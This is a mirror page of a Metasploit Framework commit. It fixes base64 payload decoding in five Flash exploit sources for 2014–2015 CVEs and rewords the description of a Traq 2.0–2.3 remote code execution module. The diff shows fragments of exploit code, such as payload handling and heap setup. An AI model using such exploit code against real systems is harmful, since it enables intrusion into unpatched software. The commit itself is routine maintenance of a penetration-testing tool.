github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-07-18 18:31:41 +02:00
Code Releases Activity

Solve conflics

Browse Source
This commit is contained in:
jvazquez-r7 2015-05-27 23:22:00 -05:00
commit e9714bfc82
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
14 changed files with 31 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2014-0556/msf.swf
View File

Binary file not shown.

BIN
data/exploits/CVE-2014-0569/msf.swf
View File

Binary file not shown.

BIN
data/exploits/CVE-2014-8440/msf.swf
View File

Binary file not shown.

BIN
data/exploits/CVE-2015-0313/msf.swf
View File

Binary file not shown.

BIN
data/exploits/CVE-2015-0359/msf.swf
View File

Binary file not shown.

5
external/source/exploits/CVE-2014-0556/Main.as vendored
View File

@ -27,7 +27,10 @@ package
public function Main()
{
var b64:Base64Decoder = new Base64Decoder()
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
var payload:String = b64.toByteArray().toString()
for (i = 0; i < bv.length; i++) {

8
external/source/exploits/CVE-2014-0569/Main.as vendored
View File

@ -32,9 +32,11 @@ package
var i:uint = 0
var j:uint = 0
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
payload = b64.toByteArray().toString();
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray().toString()
for (i = 0; i < defrag.length; i++) {
defrag[i] = new ByteArray()
defrag[i].length = BYTE_ARRAY_SIZE

7
external/source/exploits/CVE-2014-8440/Msf.as vendored
View File

@ -42,8 +42,11 @@ package
this.object_vector_length = 5770 * 2
this.byte_array_vector_length = 510 * 2
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
payload = b64.toByteArray().toString();
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray().toString()
this.initialize_worker_and_ba()
if (!this.trigger())

5
external/source/exploits/CVE-2015-0313/Main.as vendored
View File

@ -39,7 +39,10 @@ public class Main extends Sprite
private function mainThread():void
{
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray().toString()
ba.length = 0x1000

5
external/source/exploits/CVE-2015-0359/Msf.as vendored
View File

@ -43,7 +43,10 @@ package
private function mainThread():void
{
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray().toString()
ba.length = 0x1000
ba.shareable = true

11
modules/exploits/multi/http/traq_plugin_exec.rb
View File

@ -17,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits an arbitrary command execution vulnerability in
Traq 2.0 to 2.3. It's in the admincp/common.php script.
This function is called in each script located into /admicp/ directory to
make sure the user has admin rights, but this is a broken authorization
schema due to the header() function doesn't stop the execution flow. This
can be exploited by malicious users to execute admin functionality resulting
for e.g. in execution of arbitrary PHP code leveraging of plugins.php
functionality.
This function is called in each script located in the /admicp/ directory to
make sure the user has admin rights. This is a broken authorization schema
because the header() function doesn't stop the execution flow.
This can be exploited by malicious users to execute admin functionality,
e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.
},
'License' => MSF_LICENSE,
'Author' =>